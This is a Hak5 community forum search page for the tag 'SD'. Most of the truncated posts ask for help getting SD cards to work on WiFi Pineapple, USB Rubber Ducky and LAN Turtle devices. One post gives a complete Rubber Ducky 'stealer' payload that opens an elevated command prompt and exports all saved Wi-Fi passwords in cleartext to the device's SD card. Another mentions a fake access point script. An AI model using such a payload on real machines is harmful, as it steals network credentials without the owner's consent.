Jump to content

Search the Community

Showing results for tags 'SD'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Hello, I have a question regarding mounting the SD on the Nano. I don't see an fstab file on the Nano and where is the "Save Fstab" file in the web interface saving the fstab file? Here is what I've done. Nano is powered off, I put in an SD card into the Nano and powered up the Nano. SSH as root into the Nano after power up complete. Run df command, the SD card is not mounted. Issuing mount -a does not mount it. I cd to /etc/ to find the fstab file is a link to /tmp/fstab. The /tmp/fstab file does not exist. I then decided to power up the Nano first and then plug in the SD card. Af
  2. Good morning, Hak5 people. I've had a WiFi Pineapple Nano for about three years now, and was asked last night to give a demo of it to a bunch of potential banking customers. Sounded like a great opportunity. I fired it up, updated over the air to the latest firmware (2.6.1) and all seems to be going well. Go to grab a few modules - I'm thinking DNSMasq and Evil Portal will probably be enough to scare the money out of some London bankers during Cybersecurity Awareness Month, so those will do. Evil Portal installs and appears. So far, so good. It doesn't work, but it's often
  3. I'm on firmware 2.7.0 I'm not sure why the the SD card keep getting corrupted. I have an 8 GB Micro SD formated via GUI. Should I use a bigger card like 64 GB or 128 GB ? Is there a specific format that I should format the card to prevent is corruption in the future ?
  4. I need help getting my sd card to work so i can download more than 2-3 modules on the pineapple nano. I own two wifi pineapple Nanos, both are running 2.6.2, I have 4 different sd cards (lexar 4gb, san disk 16gb, san disk 32gb and a delkin 64gb) I have a laptop running MAC OS Catalina, and Windows 10 through bootcamp, I also have a pc running windows 10 and kali linux. I have been unable to mount an sd card to either pineapple Nano. I have tried to format button in pineAP GUI (says successful but does not mount, the SD.org formatting application but does not work, and using linux command line
  5. HI, I wanted to install an SD card into my Pineapple Nano but after formating it with the web GUI nothing append. I've searched the web to find an answer, tried changing Fstab, rebooting, manually formaing. fdisk -l give me this: Device Boot Start End Blocks Id System /dev/sda2 1 1 8001 83 Linux I don't know what to do. Thanks,
  6. Hey, does anyone know a cheap MicroSD card, which has about the memory they ship the RubberDucky with? I want to buy a couple of smaller MicroSD cards to store multiple scripts.
  7. Hi all, im just after buying a nano and setting it up on android as i thought that looked easier. however when i wanted to try it out and get modules i put an sd in it... and nothing happened, no lights flashing, no gui changes... nothing. so i hopped on my windows pc to try see if the card worked and it was fine. i put a .txt file with like one sentence in it on the card and then put that in the nano...nothing again, even after formatting the card in the pineapple the .txt file was there. then i cleaned the sd with diskpart on windows and reformatted it. i then tried again wit
  8. Hey all, When installing stuff to the sd card, it often needs symlinking to the working directory on the pineapple nano to complete the installation. For one-off's its fine to do manually, but on larger git install's or opkg packages with many folders/files it can be a PITA. So I got to looking around for tools/scripts, I found a few (some better than others) but think I found something that works, and works well on the pineapple YMMV. It has one small sized dependency so can be installed to pineapple nano rather than sd : - opkg update && opkg install coreutils-realpath
  9. Hello guys, I've tried everything and it seems that my USB Rubber Ducky just doesn't read any sd cards. By everything I mean: Tried 4 different SD Cards; Resetted the firmware using ducky-flasher; Changed the firmware from the original to Twin Duck; Tried different USB ports; Tried formatting the SD Cards (FAT/FAT32); Tried with empty SD Cards Tried with different inject.bin payloads; Tried with different Operating Systems; And finally, tried changing laptops. The Rubber Ducky is brand new, arrived a week or so ago and it work
  10. Hi, I've have just received my LAN Turtle, my question is about the disk space. Has anyone tried mounting the overlayFS on the SD card? is that possible?
  11. Hi all, I have successfully run Kali from a persistent USB and SD card on a Chromebook in the past, however I unfortunately didn't take down how I did it. Silly me! I have enabled Developer Mode and run; crossystem dev_boot_usb=1 dev_boot_legacy=1 dev_boot_signed_only=0 sudo chromeos-firmwareupdate --mode=todev All completed without error. However, on loading my Chromebook and pressing CTRL+U, it fails to boot from USB or SD. I just get a low-frequency beep. On pressing CTRL+L, it also fails to read any SD or USB and I get 2 high-frequency beeps. I'm at a loose end, as searching around
  12. Just got my nano finally and got a nice SD card which formatted from the nano interface.When I try to install any of the modules I get no "install to SD" option.Tried to factory reset and done the same thing several times but I never seem to get the option. Any help would be appreciated ok this is crazy.As soon as I stopped typing this I tried once again to install a module and I got the SD option
  13. Hello everyone! I'm currently trying to make the script "fakeAP" work on my Pineapple. This script simply creates a fake AP, I let you imagine what for. The problem is: This script require Scapy to work. I tried to install it but when I run the setup script, It says that it can't find "distutils.core". Distutils is used to install python package. I searched a way to install it but, when I try to install it (via OPKG or from source), it says: * pkg_write_filelist: Failed to open //usr/lib/opkg/info/python-distutils.list: No space left on device. * opkg_install_pkg: Failed to
  14. Hello, Sebkinne! I am a technical beginner from China (my English is not good, so use the translation software, if some statements are not smooth, please forgive me!), My friends help me from abroad to bring back a team your research and development equipment. I would like to ask you about SD cark! I would like to SD cark mounted on the equipment, the system uses SD cark capacity! Hopefully you can tell me how to configure "config 'global'" and "config 'mount'" and "config 'swap'". SD cark has been partitioned into ext4 and swap format. Currently I use the nano1.13 Tha
  15. SD card works sometimes, sometimes you need to remove it and put it back in order to make it work, also the recon get me " "No scan results." Even when i have 3 routers running next to me ( 2.4Gz) How do i fix that? I already did the factory reset 3 times!!
  16. I am new to having a rubber ducky and don't know much. I have trying to run a simple vbscript off the sd card. So today I flashed the ducky using the composite duck firmware (https://github.com/midnitesnake/USB-Rubber-Ducky) and used the run Payload runexe from sd from https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd. I modified the HelloWorld.exe to the name of the vbscript. However my computer does not run the script. When I look in disk management or file explorer, no drive is shown. If I run diskpart and list the volumes, I can see it with drive letter D and n
  17. So, I was fiddling with a satnav I have for my boat, and became interested in how the map data was accessed. On very old satnavs we used to have floppy disks that had the map info on them, and for a new area we had to put in a new disk. I had made backups of those to have at home, incase well, someone messed around with them intoxicated and it flew over board (yes, that actually happened one time we used the boat as transport to an island festival, there 'might' have been beer involved..) [According to our laws this is perfectly legal, and I believe it also recently became legal in the UK.]
  18. Hi all, New kid here. I'm having a problem saving infusions to SD. The Pineapple Bar doesn't seem to offer me the option like I've seen in some screenshots here in the forum. Whenever I try to install an infusion, I only get the "Install to internal storage" option in the popup. No mention of storing to SD. My firmware is 2.0.4 (flashed today). I have replaced the factory SD card with a new class 10 SD and formatted it using the "USB Info" tab on the Resources Infusion. I can verify that the /sd directory is in fact mounted on the Pineapple via SSH, and I even created a new directory in ther
  19. Hi all, I want to modify the binary on my ducky but when i plug it on my Windows, Windows do not detect anything. If I connect the ducky with this sd, the binary seems to be executed. If I connect the usb with this sd, Windows do not detect anything. I think the sd support could be dead but am I anlone with this issue? Thanks in advance
  20. UPDATE: /sd contains nothing, it isnt mounted! Any suggestions? Thanks guys! Current firmware 1.04 I had a update in pineapple bar and configuration was missing so i restarted a few times (there was a new update that fixed this issue :), but upon restart /sd contains nothing. I had all my infusions/scripts/captures etc on there. Its my understanding that the pineapple needs the SD to operate? its strange its not mounted to /sd but i can still for the most part use the pineapple. Maybe a mounting issue? what should i do? edit: Restored firmware though web interface.... still no SD!
  21. I have a 64GB card being shipped in for a phone and wondered if it would also work in the pineapple. Has anyone tried using a card larger than the supported 32G?
  22. Hi all, I've recently buy a pineapple mk5, and just as he was connected via ethernet i have install visual studio windowsphone sdk for personal purposes... "and then?!" you say. This has caused a restart of the ethernet driver while pineapple are working...when the ethernet is back on, the pineapple has been stuck. I try to resetting system defaults with 10011, but the led stuck on red solid light. Now... i follow this: https://wifipineapple.com/?flashing I have download the stager and up-to-date sd card files, but when i put the switch on 11111 and put sd inside,(i try to format FAT, F
  23. After a factory reset with the DIP switches the SD card is now blank. What is the best way to re-flash it through Windows?
  24. This stealer script exports all the Wi-Fi passwords to the SD mounted in the rubber ducky. Requirement: This one is to be used with Twin Duck firmware. DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d DELAY 500 ENTER DELAY 300 STRING netsh wlan export profile folder=%myd%\ key=clear ENTER DELAY 500 STRING exit ENTER
  25. Hi everyone, I just got my Ducky In the mail yesterday and I immediately took the SD card out, popped it in the USB to micro SD card connector. I next opened up my Finder window (I'm on OSX), went to devices and saw a untitled device, next I opened it up and saw several files on it, Then I was interrupted and had to leave my house in a hurry. Today I plugged my SD card into my USB to Micro SD connector then plugged it into my Mac... and nothing, I plugged it into my brothers mac, no device in sight, my dads Dell running windows 7... still nothing. Can someone please tell me how my Micro SD ca
×
×
  • Create New...